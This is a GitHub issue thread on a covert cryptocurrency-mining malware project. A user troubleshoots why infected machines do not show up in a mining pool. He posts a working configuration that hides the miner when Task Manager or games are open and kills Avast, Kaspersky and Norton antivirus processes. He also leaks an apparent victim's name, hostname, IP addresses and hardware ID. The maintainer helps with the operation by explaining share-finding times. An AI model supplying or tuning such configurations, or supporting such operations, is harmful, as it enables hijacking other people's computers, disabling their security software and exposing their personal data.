### ISSUE TITLE
miner not appear in pool dashboard

### ISSUE THREAD

**Issue by DARK-DEVIL-66** [UnamSanctam/SilentCryptoMiner#1900]
miners are appeared on web penal but doe's not appeare in 2miners.com dashboard ?

one miner....

User 0xbE23529837A2D706D5be0eE51f558Cb63B3f168E
Worker CMAGICLAYER
Password X
Username SYSTEM
Computer Name MAGICLAYERS
Type ethminer
Version 3.3.1
GPU AMD Radeon(TM) Graphics
CPU AMD Ryzen 7 5700U with Radeon Graphics
Active Window Running as System
Run Time 1 hour 19 minutes 4 seconds

second miner

User 0xbE23529837A2D706D5be0eE51f558Cb63B3f168E
Worker CLEOPC
Password X
Username SYSTEM
Computer Name LEO-PC
Type ethminer
Version 3.3.1
GPU NVIDIA GeForce GTX 1050 Ti
CPU Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz
Active Window Running as System
Run Time 8 minutes
Last Connection 2023-11-03 17:27:36
First Connection 2023-11-03 17:19:37

**Comment by DARK-DEVIL-66** [comment]
hashrate are growing in web penal 3mh/s but doe's not coming to pool dashboard

**Comment by DARK-DEVIL-66** [comment]
pc configration

Date: 2023-11-03 6:19:05 PM
System: Windows 10 Pro (64 Bit)
Username: Leonardo Dimitrov
CompName: LEO-PC
Language: 🇺🇸 en-US
Antivirus: Windows Defender.

  💻 Hardware:
CPU: Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz
GPU: NVIDIA GeForce GTX 1050 Ti
RAM: 16339MB
HWID: BFEBFBFF000506E3
Power: NoSystemBattery (1%)
Screen: 1680x1050

  📡 Network: 
Gateway IP: fe80::1 
Internal IP: 192.168.2.32
External IP: 2003:f5:7f03:a6a8:5514:db67:60c9:6652
BSSID: unknown

**Comment by DARK-DEVIL-66** [comment]
my configration


{
    "url": "stratums://`0xbE23529837A2D706D5be0eE51f558Cb63B3f168E`.{COMPUTERNAME}:x@etc.2miners.com:11010",
    "algo": "etchash",
    "max-gpu": 50,
    "idle-wait": 5,
    "idle-gpu": 90,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe",
    "kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,ARestore.exe,asOELnch.exe,buVss.exe,cltLMH.exe,cltRT.exe,coInst.exe,coNatHst.exe,CpySnpt.exe,EFAInst64.exe,elaminst.exe,FLDgHost.exe,InstCA.exe,MCUI32.exe,Navw32.exe,ncolow.exe,NortonSecurity.exe,NSc.exe,nsWscSvc.exe,nuPerfScan.exe,RuleUp.exe,SEFInst.exe,Sevntx64.exe,SRTSP_CA.exe,SymDgnHC.exe,symerr.exe,SymVTCatalogDB.exe,tuIH.exe,uiStub.exe,uiWNSNotificationApp.exe,Upgrade.exe,vpnCA.exe,wa_3rd_party_host_32.exe,wa_3rd_party_host_64.exe,WFPUnins.exe,wpInstCA.exe,WSCStub.exe",
    "stealth-fullscreen": false
}

**Comment by DARK-DEVIL-66** [comment]
![Uploading Screenshot 2023-11-03 at 23-17-55 Unam Web Panel Unam Sanctam.png…]()

**Comment by DARK-DEVIL-66** [comment]
![Screenshot 2023-11-03 at 23-17-55 Unam Web Panel Unam Sanctam](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/28cfdf83-c28a-4f53-9593-241ca39b26ad)

**Comment by UnamSanctam** [comment]
Since it has quite a low hashrate (because of the GPU) then finding a share will take a while. The share difficulty is 8.58G or 8580M, so at 1.3 MH/s it would take on average 8580/1.3=6600 seconds (110 minutes) to find a share.

**Comment by DARK-DEVIL-66** [comment]
ok thank's bro actually i don't know that i know only xmr hashrate 1k/s i shocket 1mh/s thank you so much !

**Comment by DARK-DEVIL-66** [comment]
User 0xbE23529837A2D706D5be0eE51f558Cb63B3f168E
Worker CLEOPC
Password x
Username SYSTEM
Computer Name LEO-PC
Type ethminer
Version 3.3.1
GPU NVIDIA GeForce GTX 1050 Ti
CPU Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz
Active Window Running as System
Run Time 2 hours 24 minutes 16 seconds


after 02 hourse doe's not appering miner bro

**Comment by UnamSanctam** [comment]
110 minutes is just the average with its hashrate, it can be longer or shorter. And 2miners also removes workers from the statistics after a while so it's possible that it found a share before and was then removed, but I don't remember how long that interval is.

**Comment by DARK-DEVIL-66** [comment]
ok i will pn 2mrow mrg
